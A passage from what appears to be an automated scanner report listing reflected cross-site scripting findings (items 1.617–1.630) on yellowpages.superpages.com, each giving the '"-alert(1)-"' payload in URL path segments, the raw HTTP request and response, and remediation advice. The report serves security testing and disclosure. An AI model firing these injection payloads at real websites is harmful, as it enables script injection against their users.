Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js48ee7&quot;-alert(1)-&quot;7ec2f5075e8/omniture_onclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=380CEA149465E878E1853CBE21E66C4D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:37 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.617. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/omniture_onclick.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df457"-alert(1)-"a7b7f4d7dfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/omniture_onclick.jsdf457&quot;-alert(1)-&quot;a7b7f4d7dfe
Server: Unspecified
Set-Cookie: JSESSIONID=9498FB0873E17746361EF5E2C5BDC544; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:45 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
es.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.618. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/recently_viewed.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db562"-alert(1)-"02c46e9b05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commondb562&quot;-alert(1)-&quot;02c46e9b05d/js/recently_viewed.js
Server: Unspecified
Set-Cookie: JSESSIONID=03649920B5E5DB0BFD83D266F18EA9E6; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:05 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.619. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/recently_viewed.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 442ba"-alert(1)-"a80008c80c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js442ba&quot;-alert(1)-&quot;a80008c80c5/recently_viewed.js
Server: Unspecified
Set-Cookie: JSESSIONID=E2823CB965F982388D18954E8635CB0A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:12 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.620. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/recently_viewed.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 470ae"-alert(1)-"830ee1c48fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/recently_viewed.js470ae&quot;-alert(1)-&quot;830ee1c48fb
Server: Unspecified
Set-Cookie: JSESSIONID=4D351DFDC8EF4B40214A7E149528CB6D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:20 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
ges.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.621. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539eb"-alert(1)-"4cc78ad7314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common539eb"-alert(1)-"4cc78ad7314/js/s_code.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common539eb&quot;-alert(1)-&quot;4cc78ad7314/js/s_code.js
Server: Unspecified
Set-Cookie: JSESSIONID=DDC3DFA0E0BB8639F6F4C62A95C26747; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:36 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common539eb"-alert(1)-"4cc78ad7314/js/s_code.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.622. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb37a"-alert(1)-"32622685d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsbb37a"-alert(1)-"32622685d4e/s_code.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsbb37a&quot;-alert(1)-&quot;32622685d4e/s_code.js
Server: Unspecified
Set-Cookie: JSESSIONID=20AEC5B794C7F22300B4AB7C1BE8B541; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:46 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsbb37a"-alert(1)-"32622685d4e/s_code.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.623. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/s_code.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e5"-alert(1)-"7e6c3fe42b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/s_code.jsb38e5&quot;-alert(1)-&quot;7e6c3fe42b7
Server: Unspecified
Set-Cookie: JSESSIONID=7C8652CC4A96C376FF779F3B2EFDF4DA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:53 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
/yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.624. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/sendtom.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bf9"-alert(1)-"8dab2c2c71d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common77bf9&quot;-alert(1)-&quot;8dab2c2c71d/js/sendtom.js
Server: Unspecified
Set-Cookie: JSESSIONID=983DC2F2B845AB07443C74AFEC6EC3C9; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:31 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.625. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/sendtom.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6a0"-alert(1)-"aaabf2e973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js1f6a0&quot;-alert(1)-&quot;aaabf2e973b/sendtom.js
Server: Unspecified
Set-Cookie: JSESSIONID=6CD48A2FE82530486D8D85DC245C52C4; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:38 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.626. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/sendtom.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eabbc"-alert(1)-"b304378f63d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/sendtom.jseabbc"-alert(1)-"b304378f63d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/sendtom.jseabbc&quot;-alert(1)-&quot;b304378f63d
Server: Unspecified
Set-Cookie: JSESSIONID=74A77B104A3B996CCA486703E507CA88; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:45 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/sendtom.jseabbc"-alert(1)-"b304378f63d?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.627. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/spflyouts.1.0.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4461d"-alert(1)-"6930c85dd26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common4461d&quot;-alert(1)-&quot;6930c85dd26/js/spflyouts.1.0.js
Server: Unspecified
Set-Cookie: JSESSIONID=F173D17509F7FCAEF102A94A23B8CBF8; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:00 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.628. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/spflyouts.1.0.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91df3"-alert(1)-"e8a95c1c0a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js91df3&quot;-alert(1)-&quot;e8a95c1c0a9/spflyouts.1.0.js
Server: Unspecified
Set-Cookie: JSESSIONID=F03C23C51384E7387839BE0403233F2F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:08 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.629. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/spflyouts.1.0.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cc0a"-alert(1)-"689c16f939c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/spflyouts.1.0.js2cc0a&quot;-alert(1)-&quot;689c16f939c
Server: Unspecified
Set-Cookie: JSESSIONID=6AC921D19E8E658E299A352472A367AB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:22 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
pages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.630. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ab9"-alert(1)-"d45a7fa5aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
